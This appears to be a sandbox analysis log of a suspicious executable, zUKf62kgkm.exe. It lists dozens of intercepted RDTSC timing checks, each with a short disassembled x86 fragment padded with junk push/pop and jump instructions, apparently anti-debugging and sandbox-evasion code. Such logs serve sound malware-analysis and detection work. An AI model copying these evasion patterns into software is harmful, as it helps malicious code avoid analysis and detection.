Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13B3740 second address: 13B37AD instructions: 0x00000000 rdtsc 0x00000002 jns 00007FCB44FB454Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jns 00007FCB44FB4557h 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push ecx 0x00000015 call 00007FCB44FB4548h 0x0000001a pop ecx 0x0000001b mov dword ptr [esp+04h], ecx 0x0000001f add dword ptr [esp+04h], 0000001Bh 0x00000027 inc ecx 0x00000028 push ecx 0x00000029 ret 0x0000002a pop ecx 0x0000002b ret 0x0000002c push 00000004h 0x0000002e call 00007FCB44FB4553h 0x00000033 pop ecx 0x00000034 nop 0x00000035 push eax 0x00000036 push edx 0x00000037 jbe 00007FCB44FB454Ch 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13B37AD second address: 13B37B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13B37B1 second address: 13B37BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FCB44FB4546h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 140C5AE second address: 140C5B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 140C5B4 second address: 140C5CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCB44FB454Ah 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jo 00007FCB44FB4546h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 140C5CB second address: 140C5CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 140C5CF second address: 140C5D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 1367E4B second address: 1367E50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 1367E50 second address: 1367E61 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop ecx 0x00000008 pushad 0x00000009 jno 00007FCB44FB4546h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 1411EC6 second address: 1411EEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jp 00007FCB4545A1C2h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 1411EEE second address: 1411EF8 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FCB44FB4552h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 1411EF8 second address: 1411EFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 1412042 second address: 1412046 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 1412046 second address: 141205D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCB4545A1B3h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 14121C7 second address: 14121CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 141249F second address: 14124D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push edx 0x00000007 pop edx 0x00000008 pop esi 0x00000009 pop edi 0x0000000a pushad 0x0000000b push esi 0x0000000c jmp 00007FCB4545A1B3h 0x00000011 pop esi 0x00000012 jmp 00007FCB4545A1B3h 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 1412A80 second address: 1412A8A instructions: 0x00000000 rdtsc 0x00000002 js 00007FCB44FB454Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 1412FD7 second address: 1412FE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FCB4545A1A6h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 1412FE5 second address: 1412FE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 1412FE9 second address: 1412FED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 1412FED second address: 1412FF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 1412FF5 second address: 141300A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCB4545A1AFh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 141300A second address: 1413010 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 1413010 second address: 1413014 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 1413AA0 second address: 1413AB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCB44FB4554h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 1413AB8 second address: 1413AC7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FCB4545A1AAh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 14180C1 second address: 14180C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 14180C5 second address: 14180D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FCB4545A1AEh 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 14180D5 second address: 14180E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jnc 00007FCB44FB4546h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 14180E4 second address: 14180E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 14180E8 second address: 14180EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 136493C second address: 136494C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007FCB4545A1A6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 136494C second address: 1364950 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 1418237 second address: 141823D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 141863E second address: 1418643 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 141891C second address: 1418935 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FCB4545A1A6h 0x0000000a jmp 00007FCB4545A1AFh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 141ED9E second address: 141EDA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 141EDA7 second address: 141EDAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 1426D18 second address: 1426D58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pushad 0x00000008 jl 00007FCB44FB4546h 0x0000000e jmp 00007FCB44FB454Dh 0x00000013 push esi 0x00000014 pop esi 0x00000015 popad 0x00000016 jmp 00007FCB44FB4558h 0x0000001b popad 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f jnl 00007FCB44FB4546h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 1426D58 second address: 1426D65 instructions: 0x00000000 rdtsc 0x00000002 je 00007FCB4545A1A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 1424F8D second address: 1424F94 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 1425378 second address: 142537F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 14254D3 second address: 14254D8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 1425611 second address: 1425619 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 1425619 second address: 1425625 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FCB44FB4546h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 1425625 second address: 142562F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 142562F second address: 1425633 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 142579A second address: 142579E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 142579E second address: 14257A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 14257A8 second address: 14257B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FCB4545A1A6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 1425908 second address: 142593B instructions: 0x00000000 rdtsc 0x00000002 jc 00007FCB44FB455Ah 0x00000008 jmp 00007FCB44FB4554h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FCB44FB4555h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 142593B second address: 1425953 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCB4545A1ABh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 1425953 second address: 1425957 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 1425AA3 second address: 1425ABD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007FCB4545A1B2h 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 1425ABD second address: 1425AC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 1425C1E second address: 1425C26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 14264C2 second address: 14264CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 14264CA second address: 142651B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCB4545A1B4h 0x00000007 jmp 00007FCB4545A1B1h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 jg 00007FCB4545A1A6h 0x00000017 jmp 00007FCB4545A1B7h 0x0000001c popad 0x0000001d pop edx 0x0000001e pop eax 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 142651B second address: 142653A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FCB44FB454Eh 0x0000000b popad 0x0000000c push esi 0x0000000d pushad 0x0000000e popad 0x0000000f jp 00007FCB44FB4546h 0x00000015 pop esi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 142653A second address: 1426544 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FCB4545A1AEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 1426544 second address: 1426568 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 jmp 00007FCB44FB454Fh 0x0000000c jnl 00007FCB44FB4546h 0x00000012 jbe 00007FCB44FB4546h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 1426B9D second address: 1426BAB instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FCB4545A1A8h 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 1424A8F second address: 1424A9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 1424A9B second address: 1424AA7 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FCB4545A1A6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 1424AA7 second address: 1424ABE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCB44FB4551h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 1424ABE second address: 1424AC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 142C6BE second address: 142C6D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCB44FB454Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 1432BE3 second address: 1432C17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007FCB4545A1B7h 0x0000000a popad 0x0000000b pushad 0x0000000c jp 00007FCB4545A1ACh 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 pop edx 0x00000016 jnl 00007FCB4545A1A6h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 14326E5 second address: 14326ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 1432837 second address: 143283D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 143F756 second address: 143F75C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 143F1C3 second address: 143F1C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 143F1C7 second address: 143F1CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 143F1CB second address: 143F1D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 143F1D1 second address: 143F1F5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FCB44FB454Ah 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop ebx 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e pop esi 0x0000000f pop edx 0x00000010 pop eax 0x00000011 jbe 00007FCB44FB457Ah 0x00000017 push eax 0x00000018 push edx 0x00000019 jo 00007FCB44FB4546h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 143F355 second address: 143F36C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCB4545A1B1h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 143F36C second address: 143F370 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 1444567 second address: 144457A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007FCB4545A1A6h 0x0000000d ja 00007FCB4545A1A6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 144457A second address: 144458D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push edx 0x0000000a pushad 0x0000000b jbe 00007FCB44FB4546h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 144458D second address: 1444595 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 1453287 second address: 145328B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 145328B second address: 145328F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 1455968 second address: 145596C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 145EAC2 second address: 145EACD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 145EACD second address: 145EAD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 145D4E6 second address: 145D4EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 145D4EA second address: 145D4EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 145D4EE second address: 145D510 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push edx 0x0000000d pop edx 0x0000000e jmp 00007FCB4545A1B3h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 145D510 second address: 145D516 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 145D838 second address: 145D854 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCB4545A1B8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 145D854 second address: 145D880 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jc 00007FCB44FB4598h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FCB44FB4554h 0x00000017 je 00007FCB44FB4546h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 145D880 second address: 145D89A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCB4545A1AEh 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 145D89A second address: 145D89E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 145D9F2 second address: 145D9FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 145D9FA second address: 145DA00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
